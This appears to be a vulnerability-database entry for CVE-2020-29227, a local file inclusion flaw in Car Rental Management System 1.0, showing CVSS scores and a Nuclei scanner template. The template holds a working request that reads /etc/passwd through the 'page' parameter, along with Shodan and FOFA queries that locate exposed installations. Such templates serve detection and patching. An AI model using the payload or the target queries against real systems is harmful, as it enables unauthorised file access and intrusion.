Lucene search

ProjectDiscoveryNUCLEI:CVE-2020-29227

HistoryJul 20, 2021 - 1:08 p.m.

Car Rental Management System 1.0 - Local File Inclusion

2021-07-2013:08:18

ProjectDiscovery

github.com

cve

2020

local file inclusion

car rental management system project

sql injection

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.5

Confidence

High

EPSS

0.012

Percentile

85.5%

JSON

Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the “page” parameter, leading to code execution.

id: CVE-2020-29227

info:
  name: Car Rental Management System 1.0 - Local File Inclusion
  author: daffainfo
  severity: critical
  description: Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, leading to code execution.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in the Car Rental Management System 1.0.
  reference:
    - https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5
    - https://nvd.nist.gov/vuln/detail/CVE-2020-29227
    - https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29227
    epss-score: 0.01244
    epss-percentile: 0.85477
    cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: car_rental_management_system_project
    product: car_rental_management_system
    shodan-query: http.html:"car rental management system"
    fofa-query: body="car rental management system"
  tags: cve,cve2020,lfi,car_rental_management_system_project,sqli

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?page=/etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402203cc2a005024db88784e43aee67a4df8d491936a6c510c86d525b3138904a5cd802203f6db67c09dd08363694a4436f3398785c26e75be24ce85e88dd82edb20b83d0:922c64590222798bb761d5b6d8e72950

References

github.com/ARPSyndicate/cvemon

github.com/ARPSyndicate/kenzer-templates

loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5

nvd.nist.gov/vuln/detail/CVE-2020-29227

www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.5

Confidence

High

EPSS

0.012

Percentile

85.5%

JSON

Related for NUCLEI:CVE-2020-29227